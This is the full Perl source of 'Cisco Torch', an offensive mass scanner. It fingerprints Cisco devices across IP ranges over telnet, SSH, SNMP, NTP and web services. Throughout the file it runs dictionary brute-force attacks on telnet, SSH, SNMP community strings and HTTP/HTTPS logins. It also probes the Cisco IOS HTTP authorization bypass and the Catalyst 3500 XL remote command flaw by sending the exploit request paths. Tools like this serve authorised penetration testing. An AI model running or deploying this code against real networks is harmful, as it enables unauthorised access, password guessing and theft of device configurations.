#!/usr/bin/perl
use IO::Socket;
use sigtrap;
use Net::hostent;
use Getopt::Std;
use Net::Telnet;
use Net::SSH::Perl;
use Net::SSLeay qw(get_https post_https sslcat make_headers make_form);
use MIME::Base64 qw(encode_base64);
use Net::SNMP;
use POSIX;

eval{require "torch.conf"};

if($@) {
   print "Failed to load config file:torch.conf\n";
}

print "Using config file torch.conf...";

my $version = "0.2b";

&getopts('AtsduncjzwVl:XF:O:b');
use vars qw(
  $opt_A
  $opt_t
  $opt_s
  $opt_d
  $opt_c
  $opt_u
  $opt_n
  $opt_V
  $opt_l
  $opt_w
  $opt_z
  $opt_a
  $opt_X
  $opt_F
  $opt_O
  $opt_b

);

if ( !$opt_F ) { $host = $ARGV[0]; }
else { chomp $opt_F; $targetfile = $opt_F }

if ($opt_V)
{
	print(" Version $version\n");
	exit(0);
}
if (
	    ( !$host && !$opt_F )
	 || ( $host && $opt_F )
	 || (        !$opt_A
		  && !$opt_t
		  && !$opt_s
		  && !$opt_w
		  && !$opt_z
		  && !$opt_X
		  && !$opt_F
		  && !$opt_u
		  && !$opt_n
		  && !$opt_b
		  && !$opt_c
		  && !$opt_j
		  && !$ARGV[1] )
  )
{
	&usage;
	exit(0);
}

if ( $opt_b && !($opt_t || $opt_s || $opt_u || $opt_c || $opt_w) )
{
	print (" -b should only be used with either -t , -s, -c  , -w or -u option\n");
	exit(0);
}

$logfile = $opt_O if $opt_O;

print("\n");
&banner;

if ($opt_l)
{

	if ( ( $opt_l !~ /^[cdv]+$/ ) )
	{
		print "Unknown loglevel defenition: " . $opt_l . "\n";
		exit(0);
	}
	$llevel = $opt_l;
}

if ($opt_F)
{
	$date = `date`;
	open( TARGETLIST, "$targetfile" )
	  || die "$0:     Could not read from $targetfile! ($!)";
	while (<TARGETLIST>) { chomp; push( @targetlist, $_ ); }
} else
{
	if ( $host =~ /[A-z]/ )
	{
		@targetlist=($host);
	} else
	{
		&GetRange;
	}
}

$tgt_cnt = defined $IPstart ? $IPend-$IPstart : $#targetlist + 1;

log_print( "List of targets contains $tgt_cnt host(s)\n", "c" );

# Determine how many scanner processes is required ------------------------------------------------------

$proc_cnt = $tgt_cnt / $hosts_per_process > $max_processes ? $max_processes : floor($tgt_cnt / $hosts_per_process);
$proc_tgt_cnt = ceil( $tgt_cnt / ($proc_cnt + 1) );
log_print( "Will fork $proc_cnt additional scaner processes\n", "c" ) if $proc_cnt;

# Fork scanner processes --------------------------------------------------------------------------------

@children = ();
for ($bi = 0, $pid = -1 ; $bi < $tgt_cnt - $proc_tgt_cnt; $bi += $proc_tgt_cnt)
{
	last if !($pid = fork());
	push(@children, $pid);
}

# Determine scan range for each process -----------------------------------------------------------------

$ei = $bi + $proc_tgt_cnt <= $tgt_cnt ? $bi + $proc_tgt_cnt - 1 : $tgt_cnt - 1;	
if (defined $IPstart)
{
	$start = GetIP($IPstart + $bi);
	$end = GetIP($IPstart + $ei);
}
else
{
	$start = $targetlist[$bi];
	$end = $targetlist[$ei];
	@targetlist = @targetlist[$bi..$ei];
}



# Perform the scan --------------------------------------------------------------------------------------

log_print( "Range Scan from $start to $end\n", "c" ) unless ( "$start" eq "$end" );
for ($c = $bi; $c <= $ei; $c++)
{
	$host = defined $IPstart ? GetIP($IPstart + $c) : $targetlist[$c - $bi];
	log_print( "$$:\tChecking $host ...\n", "c" );
	log_start();
	&scanit;
	log_write("Host: $host *****************************************************\n");
}

if ($pid)	# Master process
{
	{} until wait() == -1;	# Wait for clildren to terminate
	&endbanner;

	push (@children, $$);	
	foreach $cpid (@children)
	{
		`cat $tmplogprefix.$cpid >>$logfile && rm -f $tmplogprefix.$cpid` if (stat("$tmplogprefix.$cpid"))
	}
}

# end core
#############################
###############
# Subroutines #
###############
sub scanit
{
	if ( !&check_ip($host) )
	{
		log_print( " trying to resolve hostname $host\n\n", "c" );
		my $handler = gethost($host);
		if ( !$handler )
		{
			log_print( "$host does not resolve, I died\n\n", "c" );
			exit(0);
		}
		$target = inet_ntoa( @{ $handler->addr_list }[0] );
		log_print( "resolved host to: $target\n\n", "i" );
		$host_resolves = 1;
	} else
	{
		$target        = $host;
		$host_resolves = 0;
	}
	if ($opt_A)
	{
		$opt_u = "1";
		$opt_n =  "1";
		$opt_t = "1";
		$opt_w = "1";
		$opt_s = "1";
		$opt_c = "1";
	
		
	}
	if ($opt_t)
	{
		if (telnetfprint())
		{
			 telnet_leak_user() ? pwdbforce() : bruteforce(0) if $opt_b;
		}
	}
	if ($opt_s)
	{
		if (sshfprint())
		{
			bruteforce(1) if $opt_b;
		}
	}
	if ($opt_u)
	{
	               if ( snmp_ping()) 
	                {
	                      snmp_bruteforce(1) if $opt_b;    
	               }
	}
	
	if ($opt_n)
	{
	&ntp
	}
	
	if ($opt_z)
	{
	
     &cisco_auth_http 
	}
	if ($opt_w)
	{
		
		if (checkweb())
		{
			 
	brute_www(1) if $opt_b;
	}
	}
	if ($opt_c)
	{
	  if (ssl_finger())
	  { 
	  
	  	brute_ssl(1) if $opt_b;
	  }
	}
	
}

sub check_ip
{
	my $ipaddr = shift;
	if ( $ipaddr !~ /^[0-9\.]+$/ ) { return 0 }
	if ( $ipaddr !~ /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/ ) { return 0 }
	for ( $1, $2, $3, $4 ) { return 0 if ( $_ > 255 ) }
	return 1;
}

sub usage
{
	print( " version $version\nusage: ./cisco-torch.pl <options> <IP,hostname,network>\n\n"
	);
	print("or: ./cisco-torch.pl <options> -F <hostlist>\n\n");
	print("Available options:\n");
	print("-O <output file>\n");
	print("-A\t\tAll fingerprint scan types combined\n");
	print("-t\t\tCisco Telnetd scan\n");
	print("-s\t\tCisco SSHd scan\n");
	print("-u\t\tCisco SNMP scan\n");
	print("-n\t\tNTP fingerprinting scan\n");
	print("-l <type>\tloglevel\n");
	print("\t\tc  critical (default)\n");
	print("\t\tv  verbose\n");
	print("\t\td  debug\n");
	print("-w \tCisco Webserver scan\n");
	print("-z \tCisco IOS HTTP Authorization Vulnerability Scann\n");
	print("\t\tv  Fingerprint scan only\n");
	print("-c\t\tCisco Webserver with SSL support scan\n");
	print("-b\t\tPassword dictionary attack (use with -s, -u, -c -w or -t only)\n");
	print("-V\t\tPrint tool version and exit\n");
	print("examples:\t./cisco-torch.pl -A 10.10.0.0\/16\n");
	print("\t\t./cisco-torch.pl -s -b -F sshtocheck.txt\n");
	print("\t\t./cisco-torch.pl -P 192.168.23.32:3128 -w  -lv 192.168.10.0\/24\n");
}

sub banner
{
	log_print("###############################################################\n", "c" );
	log_print("#   Cisco Torch Mass Scanner 0.2 beta version                 #\n", "c" );
        log_print("#   Becase we need it...                                      #\n", "c" );
	log_print("#   http://www.arhont.com/cisco-torch.pl                      #\n", "c" );
	log_print("###############################################################\n", "c" );
	log_print( "\n", "c" );
}

sub checkweb
{

	log_print( "\n",                                     "h" );
	log_print( "Checking for webserver on port $port\n", "h" );
	log_print( "-----------------------------------\n",  "h" );
	my $sock = new IO::Socket::INET(
									 PeerAddr => $target,
									 PeerPort => '80',
									 Proto    => 'tcp',
									 Timeout  => '5'
	);
	if ($sock)
	{
		
		
			$sock->autoflush(1);
		
$sock->print("GET / HTTP/1.0\r\n");
$sock->print("User-Agent: Cisco-torch $version\r\n");
$sock->print("Host: $target\r\n");
$sock->print("Authorization: Basic $auth\r\n\r\n");	


		
		sleep(2);
		sysread( $sock, $httpversion, 4096 );
	
	}
		close ($sock);
	
	
		
			if ( $httpversion =~ /cisco-IOS/ )
			{
				log_print( "Cisco-IOS Webserver found\n $httpversion \n\n", "c" );
			}
			if ( $httpversion =~ /WWW-Authenticate\: Basic realm=\"level_15_access\"/ )
			{
				log_print( " Cisco WWW-Authenticate webserver found\n $httpversion\n\n", "c" );
			}
			
	
		
	
}

sub sshfprint
{
	my	$ret = 0;

	log_print( "Checking for SSH\n", "h" );
	log_print( "----------------\n", "h" );
	my $sock = new IO::Socket::INET(
									 PeerAddr => $target,
									 PeerPort => 22,
									 Proto    => 'tcp',
									 Timeout  => '5'
	);
	if ( !$sock )
	{
		log_print( "No SSH\n\n", "i" );
	}
	while ($sock)
	{
		sleep(5);
		$cnt = sysread( $sock, $buff, 10000 );
		if ( !$cnt )
		{
			log_print( "I died\n\n", "i" );
			last;
		}
		if ( $buff =~ /Cisco/ )
		{
			log_print( "Cisco found by SSH banner $buff\n", "c" );
			return 1;
		}
		close($sock);
		last;
	}


}

sub GetRange
{
	($start, $end) = @ARGV;

	if ( $start =~ /\*/ )
	{
		$end = $start;
		$start =~ s/\*+/0/g;
		$end =~ s/\*+/255/g;
	}

	( $ippart, $bit ) = split( /\//, $start );

	#CIDR
	if ( $bit ne "" )
	{
		die "Error: CIDR Mask '$bit' is invalid.\n" if $bit >= 31;

		$netip = str2ip($ippart) or die "Invalid CIDR : $start";
		$net = (2 ** (32 - $bit)) - 1;
		$mask = 0xFFFFFFFF - $net;
		$start = GetIP( $netip & $mask );
		$end = GetIP( $netip | $net );
	}

	$end = $start if ( $start ne "" && $end eq "" );

	die "need [starting IP] [ending IP]" if ( $start eq "" || $end eq "" );

	$IPstart = str2ip($start) or die "Bad starting IP";
	$IPend = str2ip($end) or die "Bad ending IP";

	if ( $IPend < $IPstart ) { die "Can't scan backwards"; }

	$IPend++;
}

sub GetIP
{
	# converts "long" (undotted) IPs into "short" (dotted) IPs
	my ($ip) = @_;

	$Class[0] = ($ip / 0x1000000 ) % 0x100;
	$Class[1] = ($ip / 0x10000 ) % 0x100;
	$Class[2] = ($ip / 0x100 ) % 0x100;
	$Class[3] = $ip % 0x100;

	join ".", @Class;
}

sub str2ip
{
	my ($str) = @_;

	return 0 unless check_ip($str);
	my @IP = split /\./, $str;

	(($IP[0] * 256 + $IP[1] ) * 256 + $IP[2]) * 256  + $IP[3]; 
}

sub log_start
{
	$log_tmp = "";
	$savelog = 1;
}

sub log_write
{
	$header = shift;

	if ($log_tmp)
	{
		open (LOGTMP, ">> $tmplogprefix.$$") || die "Can't open temporary log";
		print LOGTMP $header if $header;
		print LOGTMP $log_tmp; 
		close (LOGTMP);
	}
	$log_tmp = "";
	$savelog = 0;
}

sub log_print
{
	( my $logstring, $_ ) = @_;
	if (/[$llevel]/)
	{ 
		$log_tmp .= $logstring if $savelog;
		print $logstring;
	}
}


sub telnetfprint
{
	if ( $telnet ne "0" )
	{
		log_print( "Trying simple Telnet fingerprint\n", "h" );
		log_print( "--------------------------------\n", "h" );
		if ( !-e $fingerprintdb )
		{
			log_print( "HUH db not found, it should be in $fingerprintdb\n", "c" );
			log_print( "Skipping Telnet fingerprint\n", "c" );
			return 0;
		}
		my $sock = new IO::Socket::INET(
										 PeerAddr => $target,
										 PeerPort => 23,
										 Proto    => 'tcp',
										 Timeout  => '5'
		  );
		undef($fingerprint);
		undef($description);
		undef($return);
		undef($submitter);
		undef($hit);
		undef($buff);
		if ( !$sock )
		{
			log_print( "No telnet\n", "i" );
			return 0;
		}
		while ($sock)
		{
			sleep(3);
			$cnt = sysread( $sock, $buff, 14 );
			if ( !$cnt )
			{
				log_print( "Hmmm, probably TCP wrappers\n", "i" );
				last;
			}
			@rets = split( //, $buff );
			foreach $currentret (@rets) { $fingerprint .= ord($currentret); }
			close($sock);
			log_print( "Possible OS's\n\n", "h" );
			log_print( "Fingerprint:\t\t\t$fingerprint\n", "c" );
			last;
		}
		if ($fingerprint)
		{
			open FINGERPRINTDB, "<$fingerprintdb" || last; 
			while (<FINGERPRINTDB>)
			{
				( $description, $return, $submitter ) = split( /\!/, $_ );
				if ( "$fingerprint" eq "$return" )
				{
					 $hit = 1;
					 log_print( "Description:\t\t\t$description\n", "c" );
					 log_print( "Fingerprinting Successful\n\n", "c" );
					 last;
				}
			}
			close FINGERPRINTDB;
			$hit || log_print( "Fingerprint not found in database. If you know what it is please\nsubmit it to info\@arhont.com\n", "c" )
		}
		return $buff =~ /Password:/ ? 2 : ($fingerprint ? 1 : 0);
	}
}

#Telnet user leak check

sub telnet_leak_user
{
	my	$ret = 0;

	log_print( "Checking for telnet without a username \n", "h" );
	log_print( "----------------\n", "h" );
	my $sock = new IO::Socket::INET(
									 PeerAddr => $target,
									 PeerPort => 23,
									 Proto    => 'tcp',
									 Timeout  => '5'
	);
	if ( !$sock )
	{
		log_print( "No telnet\n\n", "i" );
	}
	while ($sock)
	{
		sleep(5);
		$cnt = sysread( $sock, $buff, 10000 );
		if ( !$cnt )
		{
			log_print( "I died\n\n", "i" );
			last;
		}
		if ( $buff =~ /Password:/ )
		{
			log_print( "Found password only telnet login ", "c" );
			$ret = 1;
		}
		close($sock);
		last;
	}

	return $ret;
}


sub pwdbforce
{
open(PASSFILE, "<$passfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@password = <PASSFILE>);
close(PASSFILE);

	foreach $pass (@password)
	{
                my $sock = new IO::Socket::INET(
                                                                                 PeerAddr => $target,
                                                                                 PeerPort => 23,
                                                                                 Proto    => 'tcp',
                                                                                 Timeout  => '5'
                  );
                if ( !$sock )
                {
                        log_print( "No telnet\n", "i" );
                        return;
                }
               
                while ($sock)
                {
                        sleep(3);
                        sysread( $sock, $buff, 1000 ) || last;
			if (! ( $buff =~ /Password:/ ) )
			{
				log_print( "Unexpected prompt\n", "c" );
				close ($sock);
				last;
			}
			syswrite( $sock, $pass."\n" ) || last;
			sysread( $sock, $buff, 1000 ) || last;
			close ($sock);
			if ( $buff =~ /[#>]/ )
			{
                                log_print("*** Found valid password : $pass\n", "c");
                                return;
			}
		}
	}
}


# SSH/Telnet default passwd check 

sub bruteforce
{
my $use_ssh = shift;
my $user, $pass, @users, @password;

open(PASSFILE, "<$passfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@password = <PASSFILE>);
close(PASSFILE);
open(USERSFILE, "<$usersfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@users = <USERSFILE>);
close(PASSFILE);

	foreach $user (@users) 
	{
		foreach $pass (@password)
		{
			print "Tryng $user:$pass\n";
			my $conn =  $use_ssh ? Net::SSH::Perl->new($host) 
					     : Net::Telnet->new("Host" => $host, "Timeout" => 5, "Prompt" => "/[#>]/" );
               		
			eval {
			 $conn->login($user, $pass);
        		 $conn->cmd("cmd");
        		};
			$conn->close() unless $use_ssh;
			if (!$@)
			{
                                log_print("*** Found valid login/password pair : $user / $pass\n", "c");
                                return;
			}
		}
	}



}



sub snmp_ping {

        my $community = public;
        my $port = 161;


        my ($session, $error) = Net::SNMP->session(
                        Hostname        => $target,
                        Community       => $community,
                        Port            => $port
                        );

        if (!defined($session))
        {
                return 0;
        }
        
        my $sysDescr = '1.3.6.1.2.1.1.1.0';
        $session->timeout(1);
        $session->retries(1);
        my $response=" ";

        if (!defined($response = $session->get_request($sysDescr)))
        {
                $session->close;
                return 0;
        }
        
        my $buff = ($response->{$sysDescr} ) ;
    
         if ( $buff =~ /Cisco/ )
		{
		    log_print( "* Cisco by SNMP found ***  \n*System Description: $buff \n\n", "c" );   
                 } 
        $session->close;
        
      
        return 1;
        
} 

sub snmp_bruteforce {      
 my $port = 161;

  open( COMMUNITYFILE,  "<$communityfile") || die " Cannot open the  community file : $communityfile ! \n";
        chomp(@community = <COMMUNITYFILE>);
close(COMMUNITYFILE);

	foreach $community (@community)
	{
       
        my ($session, $error) = Net::SNMP->session(
                        Hostname        => $target,
                        Community       => $community,
                        Port            => $port
                        );
      print "*** Check  $target community SNMP   : $community\n";    
        if (!defined($session))
        {
            
           return 0;
        }
        my $sysDescr = '1.3.6.1.2.1.1.1.0';
        $session->timeout(1);
        $session->retries(1);
        my $response=" ";

        if (defined($response = $session->get_request($sysDescr)))
        {
                $session->close;  
                       
             if  ( $community !~ "public" )
             {                              
                log_print("*** Found no public SNMP community : $community \n", "c"); 
                log_print("***System Description:$response->{$sysDescr}\n", "c" );   
                return 0 ;
              }
              log_print("*** Found Public SNMP community *** \n", "c");  
              
              }
                        
        }
        }
        
#********************************************************************************
#TFTP bruteforce 
#********************************************************************************
 
sub tftp_brute {      
 
 my $port = 69;
 my $retries=3;
 my $timeout=3;

  open( BRUTEFILE,  "<$brutefile") || die " Cannot open the  community file : $communityfile ! \n";
        chomp(@brutefile = <BRUTEFILE>);
close(BRUTEFILE);

	foreach $file (@brutefile)
	{
       $tftp = Net::TFTP->new($target, retries	=> $retries, 
       Mode => "netascii",Timeout=>5, BlockSize => 1024);

      
         $tftp->ascii;
      
        my $response=" ";
                
        $download = $tftp-> get( $file) ;
        $err = $tftp->error;
         print "Error $err get $file /n";
                 
                 
                 if (defined $tftp) 
                 {
                     
                                                          
                log_print("*** Found no TFTP server \,remote filename : $file \n", "c");    
                log_print( "$download \n", "c");
                return (0);
                 
                 }
                
	}
}    
	
                        
        
        
        
# NTP fingerprinting
#####################################################################
sub ntp {
	
if (ntp_installed())
{
	
get_ntp();
}	

}

sub get_ntp {

my $timeout = 2;
my $ntp_msg; 
 # NTP message according to NTP/SNTP protocol specification
  # open the connection to the ntp server,
  # prepare the ntp request packet
  # send and receive

    my ($remote);
   

$ntp_msg = pack "C*", (0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00); 

    # open the connection to the ntp server
    $remote = IO::Socket::INET -> new(Proto => "udp", PeerAddr => $target,
                                      PeerPort => 123,
                                      Timeout => $timeout);
                    
                    if ($remote)
                    {
# send the ntp-request to the server
    $remote -> send($ntp_msg);
                    
 # receive the ntp-message from the server
$SIG{ALRM} = \&timed_out;
alarm ($timeout);
 eval { recv($remote, $ntp_msg, 4096, 0) 
 	or die "recv: $!\n"; }       
                    }
                    
                               
      if ($ntp_msg =~/cisco/) {
       
log_print ("Found Cisco remote NTP host $target\n ","c" ) ;
        $ntp_msg =~ s/^\s+//;  
        $ntp_msg =~ s/\"//g;               
 @fields = split(/,/, $ntp_msg);
 foreach (@fields) {
 	if ($_ =~/version/) {
 	$_ =~s/mversion=//i;
 	$_=~ s/^\s+//;
log_print ("**NTP daemon:$_ \n", "c");
 	}
 	if ($_ =~/processor/) {
    $_ =~s/processor=//i;
 	$_=~ s/^\s+//;
 log_print ("**Processor:$_ \n", "c") ;
 	}
 	if ($_ =~/system/) {
 	$_ =~s/system=//i;
 	$_=~ s/^\s+//;
 log_print ("**Operation system:$_ \n \n", "c");
 }
 }
 alarm (0);
 	}
 	return 1;
 	}
   

 

 


sub ntp_installed
    {
my $ndata;
my $timeout = 2;

    	
$ndata = pack "C*",(0xDB, 0x00, 0x04, 0xFA, 0x00, 0x01,
    	  0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
		  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		  0x00, 0x00, 0xBE, 0x78, 0x2F, 0x1D, 0x19, 0xBA,
		  0x00, 0x00);
$remote = IO::Socket::INET -> new(Proto => "udp", PeerAddr => $target,
                                      PeerPort => 123,
                                      Timeout => $timeout);
                                 
                                      
                    if ($remote)
                    {
# send the ntp-request to the server
    $remote -> send($ndata);
        
     
# receive the ntp-message from the server
$SIG{ALRM} = \&timed_out;
  alarm ($timeout);
 eval { $remote -> recv($ndata, length(4096),0);
              close $remote;
              alarm (0);
              } 
             
             }
         if ($ndata)
		  { 
		   
	       return (1);
                   
        
}
return (0);
}            


sub tftp_finger
    {
my $tdata;
my $timeout = 2;
		log_print( "Trying simple tftp fingerprint\n", "h" );
		log_print( "--------------------------------\n", "h" );
		if ( !-e $tfingerprintdb )
		{
			log_print( "HUH db not found, it should be in $tfingerprintdb\n", "c" );
			log_print( "Skipping tftp fingerprint\n", "c" );
			return 0;
		}

    	
$tdata = "olja-lja";
$remote = IO::Socket::INET -> new(Proto => "udp", PeerAddr => $target,
                                      PeerPort => 69,
                                      Timeout => $timeout);
                                      
        undef($tfingerprint);
		undef($description);
		undef($return);
		undef($tsubmitter);
		undef($thit);
		undef($tbuff);
                                 
                                      
                    if ($remote)
                    {
                    	
# send the ntp-request to the server
    $remote -> send($tdata);
        
     
# receive the ntp-message from the server
$SIG{ALRM} = \&timed_out;
  alarm ($timeout);
 eval { $remote -> recv($tdata, length(4096),0);
 	        
              close $remote;
              alarm (0);
              } 
             
             }
         if ($tdata)
		  { 
		   
		   @rets = split( //, $tdata );
			foreach $currentret (@rets) { $tfingerprint .= ord($currentret); }
			log_print( "Possible OS's\n\n", "h" );
			log_print( "Fingerprint:\t\t\t$tfingerprint\n", "c" ); 
	       return (1);
                   
        
}
return (0);

	
}            
            
#*********************************************************************************
     
# Cisco IOS HTTP Auth Vulnerability";
sub cisco_auth_http
{
 
 log_print( "\n",                                     "h" );
	log_print( "Checking for webserver on port $port\n", "h" );
	log_print( "-----------------------------------\n",  "h" );
	my $sock = new IO::Socket::INET(
									 PeerAddr => $target,
									 PeerPort => '80',
									 Proto    => 'tcp',
									 Timeout  => '5'
	);
	if ($sock)
	{
		
		
			$sock->autoflush(1);
		
$sock->print("GET / HTTP/1.0\r\n");
$sock->print("User-Agent: Cisco-torch $version\r\n");
$sock->print("Host: $target\r\n");
$sock->print("Authorization: Basic $auth\r\n\r\n");
		
		sleep(2);
		sysread( $sock, $httpversion, 4096 );
	}
		close ($sock);
	
			if ( $httpversion =~ /cisco-IOS/ )
			{
				log_print( "Cisco-IOS Webserver found\n $httpversion \n\n", "c" );
				
		cisco_catoss_http();
			
		
	my $n = 16;
	while ( $n < 100 )
	{
	my $sock = new IO::Socket::INET(
									 PeerAddr => $target,
									 PeerPort => '80',
									 Proto    => 'tcp',
									 Timeout  => '3'
	);
	
		if ($sock)
		{
			print $sock "GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n";
			sleep(2);
			sysread( $sock, $buff, 1000 );
			close ($sock);
			$n++;
			print "level: $n\n";
			if ( $buff =~ ~/http\/1\.0 200 ok/ )
			{
				log_print( "* Cisco IOS HTTP Auth Vulnerability \n\n", "c" );
				
				return (0);
				exit;
			}
			
		}
	}
			}
}
#****************************************************************************

#*********************************************************************************
# Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
sub cisco_catoss_http
{
	my $sock = new IO::Socket::INET(
									 PeerAddr => $target,
									 PeerPort => $port,
									 Proto    => 'tcp',
									 Timeout  => '5'
	);
	if ($sock)
	{
		print $sock "GET /exec/show/config/cr HTTP/1.0\n\n";
		sleep(3);
		sysread( $sock, $buff, 1000 );
		close($sock);
		
		if ( $buff =~ ~/http\/1\.0 200 ok/ )
		{
			log_print("*  Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n\n",c);
		    return (1);
		}
		
		return (0);
	
		
	}
}
#*********************************************************************************

sub ssl_finger 
{
  
$Net::SSLeay::trace = 0;

# Net::SSLeay  timeot bug
my $timeout =1;

eval {
local $SIG{'ALRM'} = sub { die "Timeout Alarm" };
alarm ($timeout); 

($page, $response, @headers)
         = get_https($target, 443, '/',                   
                make_headers(User-Agent => 'Cisco-torch/0.2b',
                             Referer    => 'https://www.arhont.com'
                ));
    if ($EVAL_ERROR and ($EVAL_ERROR eq 'Timeout Alarm')) {
        print "**** Time Out\n";
        return 0;
    }
   
 
   
          if ($page, $response, @headers) {

	if ($lines = grep m/PIX/, @headers) 
	
		{
			log_print ("Cisco PIX firewall by SSL WWW found\n\n", "c");
			for ($i = 0; $i < $#headers; $i+=2) {
          log_print "$headers[$i] = " . $headers[$i+1] . "\n" , "c";
          
          
			}
		 return (1);	
     }
    if ($lines = grep m/Cisco-IOS/, @headers) 
    
     {
			log_print ("Cisco OS by SSL WWW found\n\n", "c");
			for ($i = 0; $i < $#headers; $i+=2) {
          log_print "$headers[$i] = " . $headers[$i+1] . "\n" ,"c";
             
			
			}
			 return (1);
		
     }

}  
alarm 0;

}
 
		
}

#*****************************************************************************
# HTTPS  password bruteforce main
#******************************************************************************
sub brute_ssl
             {
             		
     log_print ( "Traing brute with pass only/n" ,"i");
   if (https_brute_p())
   {
   	log_print ( "Traing brute with user:pass pair/n" ,"i");
   	https_brute_up()
   }
             }
#*****************************************************************************
# HTTPS  password bruteforce
#******************************************************************************
sub https_brute_p {
	

my  $pass,  @password, $auth;

open(PASSFILE, "<$passfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@password = <PASSFILE>);
close(PASSFILE);

		foreach $pass (@password)
		{
  
eval {
local $SIG{'ALRM'} = sub { die "Timeout Alarm" };
alarm ($timeout); 

 ($page, $result, %headers) = get_https($target, 443, '/',
	      make_headers(Authorization =>
			   'Basic ' . MIME::Base64::encode(":$pass",''))
	      );
	      print "Tryng $pass\n $result \n ";
                
    if ($EVAL_ERROR and ($EVAL_ERROR eq 'Timeout Alarm')) {
        print "**** Time Out\n";
        
    }
    if ($page, $result, @headers) {
    	
    	
     if ($result =~/200 Ok/i or $result =~/301/i) {
	 
   log_print ( "HTTPS without username password: $pass \n" , "c");
   return (0),
   exit;
    }
    }

		}
	}
}


#*****************************************************************************
# HTTPS user an password bruteforce
#******************************************************************************
sub https_brute_up {

my $user, $pass, @users, @password, $auth;

open(PASSFILE, "<$passfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@password = <PASSFILE>);
close(PASSFILE);
open(USERSFILE, "<$usersfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@users = <USERSFILE>);
close(PASSFILE);

foreach $user (@users) 
	{
		foreach $pass (@password)
		{
  

chomp($auth);
eval {
local $SIG{'ALRM'} = sub { die "Timeout Alarm" };
alarm ($timeout); 

 ($page, $result, %headers) = get_https($target, 443, '/',
	      make_headers(Authorization =>
			   'Basic ' . MIME::Base64::encode("$user:$pass",''))
	      );
                
    if ($EVAL_ERROR and ($EVAL_ERROR eq 'Timeout Alarm')) {
        print "**** Time Out\n";
        
    }
    if ($page, $response, @headers) {
    	
    	if ($result =~/200 Ok/i or $result =~/301/i) {
	 
   log_print ( "HTTPS without username password: $pass \n" , "c");
   return (0),
   exit;
    }

    }
}
		}
	}
}




#*****************************************************************************
# HTTP user an password bruteforce
#******************************************************************************
sub www_brute_up {

my $user, $pass, @users, @password, $auth;

open(PASSFILE, "<$passfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@password = <PASSFILE>);
close(PASSFILE);
open(USERSFILE, "<$usersfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@users = <USERSFILE>);
close(PASSFILE);

foreach $user (@users) 
	{
		foreach $pass (@password)
		{


### Base64 hash
  $auth = MIME::Base64::encode("$user:$pass");

chomp($auth);


$sock =IO::Socket::INET->new
                              ( PeerAddr => $target, 
                                PeerPort => 80, 
                                Proto => 'tcp',);
                                
               if ($sock)
	{                 

$sock->autoflush(1);		

$sock->print("GET / HTTP/1.0\r\n");
$sock->print("User-Agent: Cisco-torch $version\r\n");
$sock->print("Host: $target\r\n");
$sock->print("Authorization: Basic $auth\r\n\r\n");	

#sleep(3);
sysread( $sock, $buff, 4096 );
 print " Try username $user password: $pass\n";

if ($buff =~/200 Ok/i or $buff =~/301/i) {
log_print ( "HTTP username: $user  password:$pass n" , "/c");
close ($sock);
return (0);
exit;
}
	}
	
		}
	}
}
#********************************************************************************
# HTTP bruteforce without user
#*******************************************************************************
sub www_brute_p {
	


my  $pass,  @password, $auth;

open(PASSFILE, "<$passfile") || die " Cannot open the password file $passfile: $!\n";
        chomp(@password = <PASSFILE>);
close(PASSFILE);



		foreach $pass (@password)
		{


#	$auth=encode_base64("$user:$password"); ### Base64 hash
  $auth = MIME::Base64::encode(":$pass");

chomp($auth);


$sock =IO::Socket::INET->new  ( PeerAddr => $target, 
                                PeerPort => '80', 
                                Proto => 'tcp', 
                                Timeout  => '1',
                                
                                 
                              );
  
                                 
               if ($sock)
      
	{          
		$sock->autoflush(1);
		
$sock->print("GET / HTTP/1.0\r\n");
$sock->print("User-Agent: Cisco-torch $version\r\n");
$sock->print("Host: $target\r\n");
$sock->print("Authorization: Basic $auth\r\n\r\n");	

#sleep(3);
sysread( $sock, $buff, 4096 );

print " Try password: $pass\n";

if ($buff =~/200 Ok/i or $buff =~/301/i) {
log_print ( "HTTP $ target withour user name  password : $pass \n" , "c");

close ($sock);

}
	}
		}
	return (1);
}

#***************************************************************************
# HTTP bruteforce main
#****************************************************************************
sub brute_www
             {
     log_print ( "Traing brute with pass only/n" ,"i");
   if (www_brute_p())
   {
   	log_print ( "Traing brute with user:pass pair/n" ,"i");
   	www_brute_up()
   }
             	
             	
             	
             }



#**************************************************************************
sub endbanner
{
	log_print( "--->\n",                                                  "c" );
	log_print( "- All scans done. Cisco Torch Mass Scanner $version -\n", "c" );
	log_print( "---> Exiting.\n",                                         "c" );
}

